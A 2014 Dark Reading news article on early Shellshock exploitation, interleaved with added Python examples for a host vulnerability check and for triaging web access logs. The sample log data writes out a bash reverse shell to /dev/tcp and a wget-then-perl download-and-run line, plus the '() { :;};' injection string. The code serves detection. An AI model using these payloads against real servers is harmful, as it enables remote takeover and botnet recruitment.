Dark Reading

9/29/2014
01:30 PM
Making Sense Of Shellshock Attack Chaos

Attacks against the Bash bug increase in volume and variety, with an emphasis on information gathering and botnet building.

As security teams reel from last week's Shellshock headlines, attackers are catching on quickly to the vulnerability, and exploits have rapidly come out of the woodwork. Researchers immediately warned that this major vulnerability in Bash would likely have a much worse impact than Heartbleed, given the severity of the bug (it yields command execution on any service that passes attacker-controlled input into Bash's environment) and the pervasive presence of Bash on so many Linux and UNIX systems. The resulting attacks are starting to crystallize the picture of the threat.

"Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it," wrote Johannes Ullrich, director of the SANS Internet Storm Center. Ullrich reports a number of different probes, including vulnerability checks that plant the malformed function definition in several HTTP headers at once and simpler checks that carry it only in a custom User-Agent string.
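The mechanism behind those header-borne probes, as an added example that is not part of the article: a CGI gateway hands request headers to its handler as HTTP_* environment variables (User-Agent becomes HTTP_USER_AGENT, Referer becomes HTTP_REFERER, and so on), and an unpatched Bash treats any exported value that begins with `() {` as a function definition and runs whatever follows the closing brace. The Python below reproduces that path with `subprocess` instead of a real CGI server and doubles as a host check; it assumes a `bash` binary on PATH, and the header values are constructed for the example.

```python
"""Shellshock import path, reproduced without a web server (added example).

A CGI handler exports HTTP headers as HTTP_* environment variables; a vulnerable
bash parses any exported value starting with "() {" as a function definition and
executes the trailing code. On a patched bash only BASH_FUNC_name%% variables are
imported, so the injected marker never appears.
"""
import os
import shutil
import subprocess
from typing import Dict, Optional

# Marker the injected command prints if bash executed the trailing code.
MARKER = "SHELLSHOCK_INJECTED"


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Mirror what a CGI gateway does: each header becomes an HTTP_* variable."""
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def run_bash_with_headers(headers: Dict[str, str], body_cmd: str = "echo body") -> Optional[str]:
    """Spawn bash the way a CGI script would, under the header-derived environment.

    Returns bash's stdout, or None when no bash binary is installed.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    proc = subprocess.run(
        [bash, "-c", body_cmd],
        env=cgi_env_from_headers(headers),
        capture_output=True,
        text=True,
        timeout=10,
    )
    return proc.stdout


def check_bash_for_shellshock() -> Dict[str, Optional[bool]]:
    """Run a benign request and a probe request through the same path and compare.

    Returns {"bash_found": bool, "control_ok": bool|None, "vulnerable": bool|None}.
    """
    control = run_bash_with_headers({"User-Agent": "Mozilla/5.0"})  # constructed, benign
    if control is None:
        return {"bash_found": False, "control_ok": None, "vulnerable": None}
    # Constructed probe of the same shape as the in-the-wild scans: an empty
    # function body followed by the command the attacker actually wants run.
    probe = run_bash_with_headers({"User-Agent": "() { :; }; echo " + MARKER})
    return {
        "bash_found": True,
        "control_ok": "body" in control,   # the legitimate handler output still arrives
        "vulnerable": MARKER in probe,     # True only if bash ran the trailing command
    }


if __name__ == "__main__":
    print(check_bash_for_shellshock())
```

The control run matters: a vulnerable Bash still prints the handler's own output, so the only observable difference between patched and unpatched is the extra marker line, which is exactly why the scanners Ullrich describes inject something that echoes, pings or sleeps rather than something that breaks the page.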

Incapsula reported on Friday that in just 24 hours its WAF installed base had recorded 17,400 attacks against approximately 1,800 domains, originating from 400 unique IP addresses, more than half of them in China or the US. Researchers have noted not only an increasing volume of attacks but also a growing variety of ways attackers are leveraging the Bash bug to commandeer web servers.

For example, Kaspersky Lab's Stefan Ortloff detailed two attacks. One, a reverse-connect shell, will "just create a new instance of bash and redirect it to a remote server listening on a specific TCP port." The other uses specially crafted HTTP requests to install Linux backdoors on victims' servers.

However, much of the early criminal activity seems to center on the bad guys building up their botnets using the newly discovered vulnerability.

"What we are seeing here are hackers using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their 'flock,'" Ofer Gayer, a researcher for Incapsula, explained in a blog post. "During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit Shellshock vulnerability to gain server access."

This has been confirmed by researchers in Italy, who report that a botnet called wopbot, running on compromised Linux servers, went to work last week DDoSing Akamai's content delivery network and running large-scale scans against the US Department of Defense for "brute force attack purposes," according to researchers at Kaspersky. Researchers at FireEye, meanwhile, ran down a laundry list of exploitation techniques already seen in Shellshock traffic, including automated click fraud, password stealing, and backdoor installation, with payloads that include reverse-shell Perl scripts, UDP flood attacks, and IRC-based DDoS.

"The Shellshock traffic we have been able to observe is still quite chaotic," writes James Bennett of FireEye. "It is largely characterized by high volume automated scans and PoC-like exploit scripts."

Meantime, researchers at Trend Micro wrote this morning about an attack they followed against a Chinese financial institution that should give security teams pause. The attackers in that instance were simply checking whether several IP addresses owned by the institution were vulnerable to the Shellshock bug.

"Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to use the command '/bin/uname -a.' The command 'uname' displays system information, including the OS platform, the machine type, and the processor information," Trend researchers wrote. "At first glance, retrieving system information might seem harmless. But as we mentioned before, the information-gathering could possibly be a sign of preparation for more damaging routines."

This kind of early probing could be laying the groundwork for future attacks, and it does not look like an isolated instance of attack reconnaissance.
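Pulling the reports above together (the multi-header probes SANS describes, Kaspersky's reverse-connect shells, FireEye's download-and-execute payloads, and the `/bin/uname -a` reconnaissance Trend Micro saw), here is an added example, not code from the article or from any of those vendors, of the detection logic a security team would run over web access logs. It parses Apache "combined" format lines, flags the `() {` prefix in the Referer and User-Agent fields, extracts the command that follows the function body, and buckets it as reconnaissance, reverse shell, or download-and-execute, pulling out the callback address or download URL as an indicator. The log lines, addresses and URLs are constructed for the example.

```python
"""Shellshock probe/payload triage over web access logs (added example)."""
import re
from typing import Dict, List, Optional

# Apache "combined" format:  %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Simplification: header values are assumed not to contain escaped double quotes.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The Shellshock trigger: a value that starts with a (usually empty) function
# definition. Everything after the closing brace is what a vulnerable bash runs,
# so that trailing command is the part worth extracting and classifying.
INJECT_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)$')

# Indicators worth pulling out for blocking and hunting.
DEVTCP_RE = re.compile(r'/dev/tcp/(?P<host>[\w.\-]+)/(?P<port>\d+)')
NC_RE = re.compile(r'\b(?:nc|ncat|netcat)\b[^;|&]*?(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)')
URL_RE = re.compile(r'(?P<url>https?://[^\s\'";|&]+)')
RECON_WORDS = ("uname", "whoami", "id", "hostname", "/etc/passwd", "echo", "ping", "sleep")

# Constructed sample log (documentation address ranges, not real attackers).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:12:31 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { :;}; /bin/uname -a" "() { :;}; /bin/uname -a"',
    '198.51.100.7 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 200 - '
    '"-" "() { :;}; /bin/bash -c \'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\'"',
    '198.51.100.9 - - [25/Sep/2014:10:15:45 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 - '
    '"-" "() { :;}; /usr/bin/wget -O /tmp/x http://192.0.2.20/bot.pl; perl /tmp/x"',
    '192.0.2.33 - - [25/Sep/2014:10:16:10 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'not a combined-format line at all',
]


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_injection(value: str) -> Optional[str]:
    """Return the command that follows the '() { ... };' prefix, or None if absent."""
    m = INJECT_RE.search(value)
    return m.group("cmd").strip() if m else None


def classify(cmd: str) -> Dict[str, Optional[str]]:
    """Bucket the injected command and extract the indicator that matters for that bucket."""
    m = DEVTCP_RE.search(cmd) or NC_RE.search(cmd)
    if m:  # bash redirected to a remote listener, as in the reverse-connect shell
        return {"category": "reverse_shell", "indicator": f"{m.group('host')}:{m.group('port')}"}
    m = URL_RE.search(cmd)
    if m and re.search(r'\b(wget|curl|fetch)\b', cmd):  # fetch a bot/backdoor and run it
        return {"category": "download_exec", "indicator": m.group("url")}
    tokens = re.split(r'[\s;|&]+', cmd)
    if any(t in RECON_WORDS or t.rsplit("/", 1)[-1] in RECON_WORDS for t in tokens):
        return {"category": "recon", "indicator": None}  # uname/id/echo-style vulnerability check
    return {"category": "unknown", "indicator": None}


def scan_log(lines: List[str]) -> List[Dict]:
    """One finding per log line whose Referer or User-Agent carries the trigger."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        hit_headers, cmd = [], None
        for hdr in ("referer", "agent"):
            injected = extract_injection(rec[hdr])
            if injected is not None:
                hit_headers.append(hdr)
                cmd = cmd if cmd is not None else injected
        if not hit_headers:
            continue
        finding = {"host": rec["host"], "request": rec["request"],
                   "headers": hit_headers, "command": cmd}
        finding.update(classify(cmd))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']:<14} {f['category']:<14} {f['indicator'] or '-':<28} {f['command']}")
```

Two caveats a practitioner should keep in mind. First, the combined format only records two of the headers a CGI environment exposes; Cookie, Host and any custom header are equally usable by an attacker and will not appear in this log, so pair log triage with the host-side check and, above all, with patching. Second, the `() {` prefix is a string signature, and attackers vary its whitespace and later Bash parser bugs used different prefixes, which is why INJECT_RE is deliberately loose on spacing rather than an exact match.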

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Comments

Marilyn Cohodas, User Rank: Strategist, 9/30/2014 | 4:20:19 PM
Re: Hopefully this won't amount to a big deal.
Mine too :-)

Robert McDougal, User Rank: Ninja, 9/30/2014 | 4:08:40 PM
Re: Hopefully this won't amount to a big deal.
That is definitely my mantra!

Marilyn Cohodas, User Rank: Strategist, 9/29/2014 | 4:48:36 PM
Re: Hopefully this won't amount to a big deal.
I hope you are right, Robert. I think the best strategy is hope for the best, plan for the worst!

Robert McDougal, User Rank: Ninja, 9/29/2014 | 4:41:44 PM
Hopefully this won't amount to a big deal.
I am hoping that Shellshock will not live up to the hype. So far, this bug doesn't seem to be as bad or rampant as Heartbleed. Not to say that Shellshock isn't a bug that we need to pay attention to, but it doesn't seem to be as devastating as previously thought.